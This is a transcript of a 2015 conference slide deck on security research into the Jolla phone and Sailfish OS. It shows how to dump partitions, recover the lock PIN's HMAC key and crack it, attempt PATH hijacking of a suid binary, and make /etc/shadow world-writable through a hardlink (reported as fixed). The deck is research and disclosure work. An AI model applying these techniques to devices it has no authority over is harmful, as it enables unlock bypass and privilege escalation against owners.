$30 off During Our Annual Pro Sale. View Details »

"Hacking the Jolla" - Circle City Con 2015

"Hacking the Jolla" - Circle City Con 2015

Co-Presented with Vitaly McLain (https://twitter.com/send9)

Drew Suarez (utkanos)

June 14, 2015
Tweet

More Decks by Drew Suarez (utkanos)

Other Decks in Research

Transcript

  1. Hacking the Jolla
    Vitaly McLain (@send9)
    Drew Suarez (@utkan0s)

    View Slide

  2. Why this talk?
    • Explore  an  interesting  phone  
    • Show  different  attack  surfaces  a  phone  can  have  
    • Commonalities  with  mobile,  Linux,  ARM,  etc  
    • Good  intro  to  mobile  phones  /  embedded  devices  /  Linux  
    hacking  in  general

    View Slide

  3. Jolla: A History
    • Nokia  developed  Maemo
    • Then  they  merged  it  with  Intel’s  Moblin  
    • This  became  MeeGo
    • …and  then  they  got  rid  of  all  Linux  phones
    • Engineers  +  Nokia  “Bridge”  fund  ==  Jolla  Oy

    View Slide

  4. From MeeGo to Sailfish OS
    • Funding  but  no  intellectual  property
    • Mer  ==  open-­‐source  MeeGo  fork
    • Combine  open-­‐source:  Mer  +  Wayland  +  QT5/QML  
    • And  proprietary:  Silica  (compliment  to  QtQuick),  Lipstick  
    (shell  on  top  of  Wayland)
    • Change  .deb  -­‐>  openSuSE  RPM,  apt  -­‐>  zypper,  upstart  -­‐>  
    systemd  
    • We  get  Sailfish  OS!

    View Slide

  5. The Other Half
    • Really  neat  “smart  covers”  called  Other  Half  
    • Ambiance  /  theme  based  on  cover  
    • Keyboard,  other  peripherals,  etc  
    • Uses  NFC  and  I2C  to  communicate  with  device  
    • Check  out  our  EkoParty  2014  presentation  for  research  performed  by  
    Chris  Weedon
    5

    View Slide

  6. 6

    View Slide

  7. Attack Surface: Boot Process
    • Before  we  get  to  the  OS,  a  phone  has  to  boot  
    • How  can  we  explore  the  boot  loader  and  different  boot  
    modes?  How  can  we  attack  it?
    7

    View Slide

  8. What are we after?
    • Understanding the image type
    • Device topologies
    • Ramdisk contents

    View Slide

  9. Topology
    • ‘mount’ and /proc/partitions
    • /dev/block/platform/[soc]/by-name
    • ramdisk contents

    View Slide

  10. lrwxrwxrwx 1 root root 22 2014-10-18 23:40 aboot -> ../../../../mmcblk0p17
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 boot -> ../../../../mmcblk0p20
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 drm -> ../../../../mmcblk0p19
    lrwxrwxrwx 1 root root 21 2014-10-18 23:40 emgdload -> ../../../../mmcblk0p1
    lrwxrwxrwx 1 root root 21 2014-10-18 23:40 fsg -> ../../../../mmcblk0p8
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 misc -> ../../../../mmcblk0p23
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 modem -> ../../../../mmcblk0p18
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 modemst1 -> ../../../../mmcblk0p10
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 modemst2 -> ../../../../mmcblk0p11
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 pad1 -> ../../../../mmcblk0p22
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 persist -> ../../../../mmcblk0p25
    lrwxrwxrwx 1 root root 21 2014-10-18 23:45 Qcfg -> ../../../../mmcblk0p4
    lrwxrwxrwx 1 root root 21 2014-10-18 23:40 Qdlog -> ../../../../mmcblk0p5
    lrwxrwxrwx 1 root root 21 2014-10-18 23:40 Qfa -> ../../../../mmcblk0p3
    lrwxrwxrwx 1 root root 21 2014-10-18 23:40 Qglog -> ../../../../mmcblk0p9
    lrwxrwxrwx 1 root root 21 2014-10-18 23:40 Qlogfilter -> ../../../../mmcblk0p7
    lrwxrwxrwx 1 root root 21 2014-10-18 23:40 QOTP -> ../../../../mmcblk0p2
    lrwxrwxrwx 1 root root 21 2014-10-18 23:40 Qvariables -> ../../../../mmcblk0p6
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 recovery -> ../../../../mmcblk0p21
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 rpm -> ../../../../mmcblk0p16
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 sailfish -> ../../../../mmcblk0p28
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 sbl1 -> ../../../../mmcblk0p12
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 sbl2 -> ../../../../mmcblk0p13
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 sbl3 -> ../../../../mmcblk0p14
    lrwxrwxrwx 1 root root 22 2014-10-18 23:54 security -> ../../../../mmcblk0p27
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 ssd -> ../../../../mmcblk0p26
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 swap -> ../../../../mmcblk0p24
    lrwxrwxrwx 1 root root 22 2014-10-18 23:40 tz -> ../../../../mmcblk0p15

    View Slide

  11. 179 0 15267840 mmcblk0
    179 1 4079 mmcblk0p1 emgdload
    179 2 32768 mmcblk0p2 QOTP
    179 3 4096 mmcblk0p3 Qfa
    179 4 4096 mmcblk0p4 Qcfg
    179 5 4096 mmcblk0p5 Qdlog
    179 6 2048 mmcblk0p6 Qvariables
    179 7 2048 mmcblk0p7 Qlogfilter
    179 8 4096 mmcblk0p8 fsg
    179 9 49152 mmcblk0p9 "SYSLOG"
    179 10 4096 mmcblk0p10 modemst1
    179 11 4096 mmcblk0p11 modemst2
    179 12 2048 mmcblk0p12 SBL1
    179 13 2048 mmcblk0p13 SBL2
    179 14 2048 mmcblk0p14 SBL3
    179 15 2048 mmcblk0p15 trustzone
    179 16 2048 mmcblk0p16 rpm
    179 17 2048 mmcblk0p17 aboot
    179 18 65536 mmcblk0p18 "FIRMWARE"
    179 19 8192 mmcblk0p19 "DRM"
    179 20 12288 mmcblk0p20 12MB (GOOD TARGER FOR K/R) KERNEL
    179 21 12288 mmcblk0p21 12MB (GOOD TARGET FOR K/R) RECOVERY
    179 22 8192 mmcblk0p22 pad1
    179 23 8192 mmcblk0p23 misc
    179 24 520184 mmcblk0p24 "SWAP"
    179 25 8192 mmcblk0p25 "PERSIST"
    179 26 8 mmcblk0p26 ssd
    179 27 8192 mmcblk0p27 "SECURITY"
    179 28 14415855 mmcblk0p28 "HOME /"

    View Slide

  12. Extracting images for investigation
    • Grab partitions with dd command
    $ dd if=/dev/block/mmcblk0p21 of=~/blkp21.img
    • Tools can help to explore / extract parts of images
    12

    View Slide

  13. utkanos@leviathan ~/jolla $ od -c mmcblk0p21.img | more
    0000000 A N D R O I D ! 0 H ] \0 \0 200 200
    0000020 257 022 6 \0 \0 \0 202 \0 \0 \0 \0 \0 \0 020 201
    0000040 \0 001 200 \0 \b \0 \0 \0 \0 \0 \0 \0 \0 \0 \0
    0000060 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0
    0000100 i n i t = / s b i n / p r e i n
    0000120 i t r o o t = / d e v / m m c
    0000140 b l k 0 p 2 8 r o o t f s t y
    0000160 p e = b t r f s r o o t f l a
    0000200 g s = r e c o v e r y n o i n
    0000220 i t r d a n d r o i d b o o t
    0000240 . h a r d w a r e = q c o m u
    0000260 s e r _ d e b u g = 3 1 e h c
    0000300 i - h c d . p a r k = 3 m a x
    0000320 c p u s = 2 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0
    0000340 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0

    View Slide

  14. binwalk

    View Slide

  15. mkboot

    View Slide

  16. Jolla’s Boot/Recovery
    • Structure
    • Inspecting the Firmware
    • Lock/Unlock

    View Slide

  17. Structure
    • Android style images for recovery
    • Android boot header
    • zImage and rootfs.cpio

    View Slide

  18. Image signing?
    • lk is patched in 1.1.0.38 (Uitukka)
    • New LK attacks out there
    • Fixes RSA cube root attack on signature
    • Currently images are not signed…

    View Slide

  19. Recovery / fastboot mode
    • Access recovery with vol down + power at boot (no usb)
    • telnet based connection
    • menu system of shell scripts
    • Access fastboot with vol down + power at boot (w usb)
    • needs identifier 0x2931 (fastboot -i 0x2931)
    • not all args supported, locked by default

    View Slide

  20. 20

    View Slide

  21. Recovery Menu
    • Recovery menu driven by shell scripts
    • Contains option to lock/unlock boot loader,
    get root shell
    • Can be protected by setting PIN code on
    phone (in Sailfish UI)
    21

    View Slide

  22. Quirks
    • 5 attempts at pin code, then throttled
    • After 5 wrong pins, a file is written to
    ramdisk
    • Docs say reset is after 24 hours…
    • … a reboot clears it (not surprising)

    View Slide

  23. How are these modes protected?
    • Security code can be set in userland via system settings
    • Discovered restore-lock binary in recovery ramdisk
    • mmcblk0p27 (security partition)
    • header shows lock/unlock status
    • possible hash?
    • partition 6 changes based on lock status
    • partiton 2 had interesting string as well

    View Slide

  24. mmcblk0p27 (locked, unlocked)

    View Slide

  25. mmcblk0p6 (after bootloader unlock)
    [root@Jolla nemo]# od -c p6_postblunlock.img
    0000000 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0
    *
    0010240 \0 \0 \0 \0 d f s c k \0 \0 \0 \0 \0 \0 \0
    0010260 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0
    *
    0010660 \0 \0 \0 \0 \0 \0 \0 377 377 377 377 377 \0 \0 \0 \0
    0010700 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0
    *
    0047500 \0 \0 \0 \0 \0 K 1 2 C o L N u O e M
    0047520 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0
    *
    10000000

    View Slide

  26. mmcblk0p2
    utkanos@leviathan ~$ od -c mmcblk0p2.img
    0000000 X I 002 026 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0
    0000020 3 5 9 7 4 5 0 5 0 0 8 3 1 5 0 \0
    0000040 300 230 d 9 261 253 277 M ? 036 230 D 037 y 241 031
    0000060 5 0 5 6 A 8 0 0 1 F 5 5 \0 \0 \0 \0
    0000100 5 0 5 6 A 8 0 1 1 F 5 5 \0 \0 \0 \0
    0000120 235 224 p 315 K } 377 \ + & 231 177 036 224 350 n
    0000140 264 311 205 @ \n \f 327 V 373 K 210 ~ < ' 265 020
    0000160 337 \t , ~ 017 370 022 251 \ 321 251 I 217 } 364 223
    0000200 201 * \n 314 036 \ 373 % 244 252 361 303 270 7 211 w
    0000220 234 W 027 226 c m 8 m p Y 205 265 \v 367 y \v
    0000240 006 337 300 332 037 Y B 323 350 367 233 277 R ? 017 253
    0000260 301 J 332 240 021 353 253 # 360 233 306 350 V 245 255 w
    0000300 001 244 Z 325 F 335 257 202 362 # 326 ^ 346 g 221 !
    0000320 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0 \0
    *
    200000000
    Other images involved in device lock…

    View Slide

  27. Thoughts
    • If you have a Jolla, enable device lock and
    developer mode!
    • not an ideal security model
    • at least some protection
    • Interesting mix of different software may
    expose additional issues later on

    View Slide

  28. Let’s put it together…
    • What are some of the values we saw used
    for?
    • How does the phone store the lock PIN?
    • Can we recover it?
    28

    View Slide

  29. Let’s put it together…
    • We saw a 160-bit hash value earlier. Sounds
    like SHA-1.

    • We saw the restore-lock binary which
    performs the actions we’re interested in.

    • Why don’t we look at how it checks the PIN
    code…
    29

    View Slide

  30. 30

    View Slide

  31. View Slide

  32. What is it doing?
    • Disassembly shows it using…
    • Something from mmcblk0p2
    • A static string
    • Another value from mmcblk0p2
    • A static string
    • Calling into OpenSSL for EVP_SHA1 and
    HMAC functions
    • The concatenated string is the key for
    HMAC-SHA1
    32

    View Slide

  33. Extracting the key
    • restore-lock comes from recovery, but
    it’s a regular ARM ELF binary
    • Should be able to read partitions in the OS
    too
    • Can use tools right in Sailfish instead of
    instrumenting recovery

    33

    View Slide

  34. 34
    [root@Jolla nemo]# ./restore-lock --check-code 1233
    [root@Jolla nemo]# echo $?
    1
    [root@Jolla nemo]# ./restore-lock --check-code 31337
    [root@Jolla nemo]# echo $?
    0
    Yep, works fine!

    View Slide

  35. Getting the key
    • Run  restore-­‐lock  in  gdb  within  Sailfish  
    • Set  breakpoint  on  HMAC  function  
    • Grab  the  key  when  breakpoint  hits  
    35

    View Slide

  36. HMAC gets the key
    36
    According to https://www.openssl.org/docs/crypto/hmac.html, this is the function prototype…
    unsigned char *HMAC(const EVP_MD *evp_md, const void *key,
    int key_len, const unsigned char *d, int n,
    unsigned char *md, unsigned int *md_len);

    View Slide

  37. Extract the key and test it
    • Knowing  ARM  calling  convention,  that  second  
    argument  should  be  in  register  R1  
    • Sure  enough…

    37
    Breakpoint 1, 0x400dec14 in HMAC () from /lib/libcrypto.so.10
    (gdb) x/s $r1
    0xbefff734: "359745050083150010101011115A05AF0161101101000111"

    View Slide

  38. View Slide

  39. It works!
    • We  know  the  key,  we  know  two  parts  are  static,  
    we’ll  figure  out  more  in  a  bit  
    • Having  hash  and  HMAC  key,  how  to  recover  
    plaintext  pin?  
    • hashcat  does  a  great  job  at  HMAC-­‐SHA1…


    39

    View Slide

  40. Attack Surface: Operating System
    • Early  versions  of  mobile  operating  systems  
    often  have  bugs  from  the  90s  
    • Linux  /  userland  bugs  will  affect  this  
    environment  too  
    • Focus:  map  out  Sailfish/Jolla/Meego-­‐specific  
    attack  surface  
    40

    View Slide

  41. Operating System
    • Many  interesting  binaries  on  the  device  
    • A  lot  of  test  binaries  and  applications  left  intact  
    • Not  sure  if  this  is  a  result  of  enabling  developer  mode  or  if  this  is  stock  
    • Ex:  qseecomd_security_test,  oemwvtest,  StoreKeybox  
    • Attack  surface  is  potentially  huge,  but  gets  small  quickly.  
    • Virtually  no  listening  services  other  than  DHCP,  so  remote  attack  
    surface  is  small  from  a  network  perspective.  
    • Leaves  plenty  of  room  for  vulnerable  applications

    View Slide

  42. Operating System
    • You  say  you  want  security?  Sandboxing,  ASLR,  RELRO,  PIE,  NX,  etc?  
    • Nope…  not  here,  Well,  some  of  it  is  (see  next  page)  
    • As  of  now,  the  system  relies  heavily  on  *nix  USER/FS  permissions  
    • Which  isn’t  bad…  it’s  just  not  great  
    • There  are  plans  to  implement  these  things  in  the  future  though…
    42

    View Slide

  43. Operating System
    • No  Kern  Heap  Hardening  
    • No  grsec/PaX  
    • No  user  copy  checks  
    • No  enforcement  of  read-­‐
    only

    View Slide

  44. Operating System
    • CPU  NX  bit  support?  -­‐-­‐  Nope
    44

    View Slide

  45. Operating System
    • Stack  canaries?  RELRO?  PIE?  
    • Some  but  not  all

    View Slide

  46. Application Layer
    • Stock  Applications  
    • Most  Applications  are  written  in  C/C++  
    • Although  there  are  lots  of  shell  scripts  on  the  device  
    • Mix  of  ELF32  Arm7vh  binaries  and  QML  “applications”,  I’m  using  
    application  here  very  loosely    
    • Often,  the  binaries  have  QT  API  calls  embedded  in  them  that  leverage  
    the  QML  “applications”.  
    • Picture  the  binary  as  the  service,  and  the  QML  as  the  GUI  
    • What  is  QML?    
    • QT  Meta  Language  or  QT  Modeling  Language  
    • It’s  like  Javascript,  Openscad,  Python,  and  Latex  all  rolled  into  one  
    • Used  to  describe  what  something  will  look  like,  and  the  action  that  thing  will  
    perform

    View Slide

  47. QML
    • What is QML?(2)

    View Slide

  48. The Userland
    • All  regular  apps  run  as  “nemo”  
    • That’s  how  you  access  phone,  too  
    • Use  SSH  via  USB  or  network  in  dev  mode

    View Slide

  49. Attack Surface: Userland
    • Some  binaries  as  root  via  invoker
    • And  there  are  traditional  some  suids/sgids


    $ find / -type f -perm -u+s 2>/dev/null

    • Interesting:  owned  by  root  or  gid  ==  privileged
    • Not  common  to  other  Linux  distros  (Sailfish/Mer/Maemo  binaries?)

    View Slide

  50. A few interesting binaries…
    • /usr/bin/simkit  [sgid  privileged]  –  New-­‐er.  Research  ongoing  

    • /usr/bin/csd  [suid  root/gid  disk]  –  Diagnostic  utility  (can  also  
    be  triggered  via  *#*#310#*#*  on  dialer).  Neat  by  itself.
    • /usr/libexec/mapplauncherd/booster-­‐silica-­‐qt5  [suid  root]  –  
    Used  to  support  Silica  extensions,  uses  maplauncherd  
    • /usr/bin/devel-­‐su  [suid  root]  –  Custom  SU.  Written  in  C!  No  
    stack  canaries  or  PIE

    View Slide

  51. But what to do?
    • Readelf,  objdump,  gdb,  gdbserver  available  or  install  via  
    pkcon  
    • Memory  corruption  would  be  nice
    • Fuzz  input
    • Fuzz  environmental  variables
    • Get  more  intelligent  ☺  
    • But  it’s  also  very  dangerous  for  suids  to  shell  out
    • We  should  look  for  system()  and  popen(),  right?

    View Slide

  52. Oh wait, C++ and QT
    [nemo@Jolla  ~]$  ls  -­‐al  /usr/bin/csd  
    -­‐rwsr-­‐sr-­‐x  1  root  disk  140572  2014-­‐05-­‐21  13:52  /usr/bin/csd  
    [nemo@Jolla  ~]$  readelf  -­‐a  /usr/bin/csd  |  grep  system  
    [nemo@Jolla  ~]$  readelf  -­‐a  /usr/bin/csd  |  grep  popen  
    [nemo@Jolla  ~]$  readelf  -­‐a  /usr/bin/csd  |  grep  QProcess  
    99:  00000000          0  FUNC        GLOBAL  DEFAULT    UND  _ZN8QProcess15waitForFini  
         113:  00000000          0  FUNC        GLOBAL  DEFAULT    UND  _ZN8QProcess21readAllStan  
         143:  00000000          0  FUNC        GLOBAL  DEFAULT    UND  _ZN8QProcessC1EP7QObject  
         149:  00000000          0  FUNC        GLOBAL  DEFAULT    UND  _ZN8QProcess5startERK7QSt  
         166:  00000000          0  FUNC        GLOBAL  DEFAULT    UND  _ZN8QProcess7executeERK7Q  
         170:  00000000          0  FUNC        GLOBAL  DEFAULT    UND  _ZN8QProcessD1Ev  
         235:  00000000          0  FUNC        GLOBAL  DEFAULT    UND  _ZN8QProcess5startERK7QSt

    View Slide

  53. View Slide

  54. 54

    View Slide

  55. Tried to have this executed…
    #include    
    #include    
    #include    
    int  main(int  argc,  char  **argv)  {  
      setuid(0);  
      setgid(6);  
      FILE  *f  =  fopen("flag",  "w");  
      fprintf(f,  "UID,  EUID:  %d,  %d\n",  getuid(),  geteuid());  
      fclose(f);  
      return(0);  
    }

    View Slide

  56. Looked promising…
    $ env PATH=.:$PATH /usr/bin/csd
    [D] QWaylandEglIntegration::QWaylandEglIntegration:58 - Using Wayland-EGL  
    [W] QQmlImportDatabase::importPlugin:1697 - Module 'Sailfish.Silica' does not
    contain a module identifier directive - it cannot be protected from external
    registrations.  
    [D] FactoryUtils::getFlags:94 - FILE said: "4436"  
    [D] FactoryUtils::isVerified:123 - Head = "4436"  
    [D] FactoryUtils::writeCsdResults:55 - writeCsdResults:
    "0000000000000000000000000000000000000000000000000000000000000000000000000000000000
    0000000000"  
    DeclarativeCoverWindow: I have a default alpha buffer  
    [D] FactoryUtils::writeCsdResults:55 - writeCsdResults:
    "0000000000000000000000000000000000000000000000000000000000000000000000000000000000
    0000000000"  
    Clicked 28  
    [D] SdCardTest::getSdCardPath:49 - sdpath = "/run/user//media/sdcard"

    View Slide

  57. Nope ☹
    • Content  of  “flag”:  UID,  EUID:  100000,  100000  (nemo)
    • Drops  privs  
    • Probably  bash  priv  mode?

    View Slide

  58. Turns out…
    • Only  doesn’t  drop  privs  for  a  few  functions  
    • chmod()’s  a  few  thing  in  /sys  
    • Not  much  you  can  do  other  than  disable  a  charger…

    View Slide

  59. View Slide

  60. View Slide

  61. Basic fuzzing: no-go either
    • Dumb  fuzzing:
    • Common  strings  (various  sizes  of  “A”,  format  
    strings,  etc)  for  input
    • Same  for  env  variables
    • Got  some  SIGABRTs  but  no  crashes

    View Slide

  62. Other low-hanging fruit
    • Init  scripts  common  place  to  look  for  vulns  across  
    mobile  platforms  
    • grep’ing  /init*  for  chown  and  chmod  are  good  staring  
    points  
    • Can  we  get  it  to  chmod,  chown  or  do  something  else  to  
    a  file  in  a  location  we  can  write  to?  
    • Can  we  symlink?  Or:  hardlink.  Sailfish  didn’t  follow  
    symlinks  but  does  follow  hardlinks,  not  sure  why…  
    62

    View Slide

  63. One fun example (fixed in next release)
    63
    [nemo@Jolla vuln]$ ls -al /etc/shadow
    ---------- 1 root root 1772 2015-03-04 00:17 /etc/shadow
    [nemo@Jolla vuln]$ ln /etc/shadow vuln.log
    [nemo@Jolla vuln]$ ls -al
    total 4
    drwxrwxr-x 1 nemo nemo 24 2015-03-29 22:44 .
    drwxrwx--x 1 system system 178 2015-03-04 00:06 ..
    ---------- 2 root root 1772 2015-03-04 00:17 vuln.log
    [nemo@Jolla vuln]$
    [nemo@Jolla vuln]$ ls -al /etc/shadow
    -rw-rw-rw- 2 root root 1772 2015-03-04 00:17 /etc/shadow
    [nemo@Jolla vuln]$ head /etc/shadow
    root:!*:16010:0:99999:7:::
    bin:*:16010:0:99999:7:::
    daemon:*:16010:0:99999:7:::

    View Slide

  64. Another oddity (already fixed!)
    64
    [nemo@Jolla tmp]$ ln -s /etc/anyfile udhcpd.conf
    [nemo@Jolla tmp]$ ls -al udhcpd.conf
    lrwxrwxrwx 1 nemo nemo 12 2015-03-29 22:34 udhcpd.conf -> /etc/anyfile
    [nemo@Jolla tmp]$ ls -al /etc/anyfile
    ls: cannot access /etc/anyfile: No such file or directory
    Now, plug computer USB cable into phone, or somehow simulate this action.
    [nemo@Jolla tmp]$ ls -al /etc/anyfile
    -rw-r--r-- 1 root root 80 2015-03-29 22:35 /etc/anyfile
    [nemo@Jolla tmp]$ cat /etc/anyfile
    start 192.168.2.1
    end 192.168.2.10
    interface rndis0
    option subnet 255.255.255.0
    [nemo@Jolla tmp]$ whoami
    nemo
    [nemo@Jolla tmp]$ id
    uid=100000(nemo) gid=100000(nemo) groups=39(video),100(users),995(ssu),996(timed),999(oneshot),1000(system),
    1002(bluetooth),1003(graphics),1004(input),1005(audio),1006(camera),1024(mtp),100000(nemo)

    View Slide

  65. Shellshock
    • It  was  vulnerable
    • Couldn’t  find  anything  to  use  it  on:  nothing  suid  loaded  
    env  vars,  dhclient  not  in  use
    • Maybe  missed  opportunity  with  some  binaries  that  run  
    from  invoker.  Or  CSD.
    • Patched  in  latest  hotfix  

    View Slide

  66. What about the kernel?
    # lsmod
    Module Size Used by  
    wlan 2592646 0  
    cfg80211 144905 1 wlan
    # uname -a  
    Linux Jolla 3.4.91.20140612.1 #1 SMP PREEMPT Mon Jun 16 17:24:16 UTC 2014 armv7l
    armv7l armv7l GNU/Linux

    View Slide

  67. Patched for most modern CVEs
    $  for  ((i  =  39;  i  <=  150;  i++));  do  ./trigger_sock_diag  $i;  done  
    Sending  with  family  39  
    Sending  with  family  40  
    Sending  with  family  41  
    Sending  with  family  42  
    Sending  with  family  43  
    Sending  with  family  44  
    Sending  with  family  45  
    Sending  with  family  46  
    …..

    View Slide

  68. Normal functionality gone bad
    • Normal  Linux  kernel  functionality  not  always  well  
    configured  
    • For  example,  "nemo"  user  is  in  group  "system",  which  
    has  write  access  to  procfs  endpoints  you  wouldn't  
    expected,  i.e...


    --w--w---- 1 root system 0 2015-06-13 22:24 /proc/sysrq-trigger

    68

    View Slide

  69. Attack Surface: IPC
    • Inter-­‐process  communication  is  another  important  
    OS  /  mobile  attack  surface  
    • iOS  uses  URL  handlers,  Android  uses  Intents/Binder/
    ASHMEM  -­‐  all  have  led  to  vulnerabilities  in  the  past  
    • What  does  Sailfish  OS  use?  
    69

    View Slide

  70. D-Bus
    • Freedesktop’s  D-­‐Bus  used  for  IPC  
    • Common  to  other  Linux  environments  
    • …but  everything  runs  as  “nemo”  
    • dbus-­‐monitor  provided,  acts  as  sniffer  
    • Regular  user  discovered  Outlook  passwords  
    • Interesting  area  to  explore  further  

    View Slide

  71. 71

    View Slide

  72. Mapping D-Bus
    • Tavis  Ormandy  (@taviso)  just  released  dbusmap,  an  
    “nmap  for  dbus”  -­‐  https://github.com/taviso/dbusmap  
    • Enumerates  methods  and  properties  exposed  by  D-­‐Bus  
    services  
    • Amongst  standard  D-­‐Bus  services,  several  belonged  to  
    Jolla  /  Meego  /  Nokia
    72

    View Slide

  73. Exploring D-Bus
    • Can  affect  code  across  privilege  boundaries  -­‐  not  just  
    suid  binaries  can  execute  as  root.    
    • All  same  vulns  apply.  Look  for  low-­‐hanging  fruit  
    (command  execution,  etc),  memory  corruption,  etc  
    • Did  some  manual  fuzzing  (no  results),  looking  
    into  dbus  fuzzers  (suggestions?)  
    • Methods  /  properties  can  be  interacted  w/  using  
    dbus-send
    73

    View Slide

  74. Let's try out dbus-send
    74
    $ dbus-send --print-reply --system --dest=org.nemo.ssu /org/nemo/ssu org.nemo.ssu.deviceUid
    method return sender=:1.71 -> dest=:1.70 reply_serial=2
    string "359745050083150"
    m:org.nemo.ssu.deviceUid /org/nemo/ssu

    View Slide

  75. Attack Surface: User Interaction
    • How  can  the  user  be  attacked?    
    • What  binaries  /  utilities  /  whatever  does  the  vendor  
    provide  that  users  interact  with  and  you  have  a  chance  
    to  affect?  
    • Exposed  services,  anything  that  reads  files  (word  
    processing,  etc)  
    75

    View Slide

  76. Attacking Sailfish users
    • One  possibility:  /usr/bin/jolla-­‐contacts  parses  
    VCF  (vCard)  files
    • Use  ruby  gem  vCardigan  to  generate  tons  of  
    valid  VCF  files  with  various  fuzz  strings  
    • Lots  of  hangs,  no  crashes  yet

    View Slide

  77. Third-Party Apps
    • 3rd  Party  Apps
    • We  reached  out  to  Jolla  to  ask  them  what  the  
    lifecycle  was  like.
    • They  seemed  unsure  of  what  we  were  asking…  still  waiting  
    for  response(update  with  current  info  before  conf)

    View Slide

  78. How to pen-test the platform
    • How  do  you  assess  the  platform  itself?  
    • What  do  you  do  if  tasked  with  assessing  app  that  
    runs  on  platform?
    78

    View Slide

  79. Pentesting Applications
    • Traffic  can  be  captured  as  easily  as  on  any  other  Linux  system
    • Setup  proxies  for  HTTP/HTTPS  connections(we  all  know  how  to  
    do  that)
    • Create  your  own  IPTables  rules  and  scripts  to  forward  anything  
    wherever  you  want
    • Get  Dynamic:  Fashion  Scripts,  to  load  rules  when  certain  
    applications  run

    View Slide

  80. More on proxying
    • Browser  traffic:  .js  file    
    • General  traffic:  long-­‐hold  WiFi  SSID,  click  Edit  
    • Cert  pinning  (or  client-­‐side  certs?)  -­‐  Store,  Updates  
    • Weirdness:  if  you  check  for  updates,  the  actual  updates  are  NOT  
    cert  pinned  (snagged  the  RPMs  this  way)  
    • As  an  aside:  it  sends  your  Jolla  creds  with  a  hashed  password  
    • Installing  CA  cert  (like  Burp’s)  is  easy.  Look  online.  
    • put  in  /etc/pki/tls/certs/  
    • run  multi_c_rehash

    View Slide

  81. Pentesting Applications
    • It’s  similar  to  pentesting  any  linux  system  application:
    • Evaluate  File  Permissions
    • Use  Old  Friends  like:
    • GDB
    • LDD
    • Strace
    • Strings
    • Etc…
    • Then  find  the  location  of  the  applications  QML  files  and  it’s  code  review  time

    View Slide

  82. Pentesting Applications
    • Sailfish  Quirks…  
    • Invoker  
    • invoker  was  primarily  designed  to  boost  app  startup  times  
    and  save  device  memory  
    • Also  invoker  handles  Group  and  User  Privs,  such  as  access  
    to  the  credentials  store  or  contacts  DB  
    • What  is  Invoker  really?  
    • Turns  out  invoker  is  basically  just  a  wrapper  to  
    ‘mapplauncherd’  
    • The  invoker  binary  takes  the  app  name  and  a  default  set  of  
    options  in  the  invoker  binary  and  passes  them  to  
    mapplauncherd

    View Slide

  83. Attack Surface: Hardware
    • Emerging  attack  surface  
    • JTAG  ports,  exposed  I2C  and  SPI,  etc  
    • More  and  more  tools  (hardware  and  software)  
    to  explore  this  surface  (JTAG  tools,  logic  
    analyzers  with  intuitive  software,  etc)  
    • Can  be  used  to  bypass  software  restrictions  
    83

    View Slide

  84. Other Half: NFC
    • NFC  sticker  tells  phone  what  theme  to  download
    • NFC  radio  only  active  when  switched  pressed
    • Sticker  is  standard  MiFARE  Ultralight  
    • Handled  by  tohd  daemon
    • NFC  stack  in  N9  fuzzed  by  Charlie  Miller,  no  
    results.  Different  in  Sailfish?

    View Slide

  85. View Slide

  86. Other Halves
    • I2C  Port
    • Start  by  downloading  the  TOH  Developer  Kit:
    • Realize  that  is  useless  for  I2C  stuff
    • Develop  your  own  methodology
    • Where  my  I2C  fuzzers  at  google?
    • Seems  like  no  one  has  ever  bothered  to  fuzz  I2C
    • Start  by  writing  the  dumbest  I2C  fuzzer  ever
    • Materials:
    • Bus  Pirate  (Wanted  to  implement  on  an  FPGA  but  my  VHDL/Verilog  is  
    garbage)
    • Logic  Analyzer
    • Jolla  in  Developer  Mode
    • GDB
    • Python(pyBusPirate)

    View Slide

  87. Shoutouts
    • Chris  Weedon,  our  research  partner  and  fellow  
    Jolla  hacker.  Read  our  EkoParty  deck  for  his  
    hardware  research!  
    • CircleCityCon  crew  for  having  us!  
    • All  of  you  that  came  to  hear  about  an  obscure  
    Finnish  phone  :)  
    87

    View Slide

  88. Thank  you!  
    Questions?  Comments?  Complaints?

    View Slide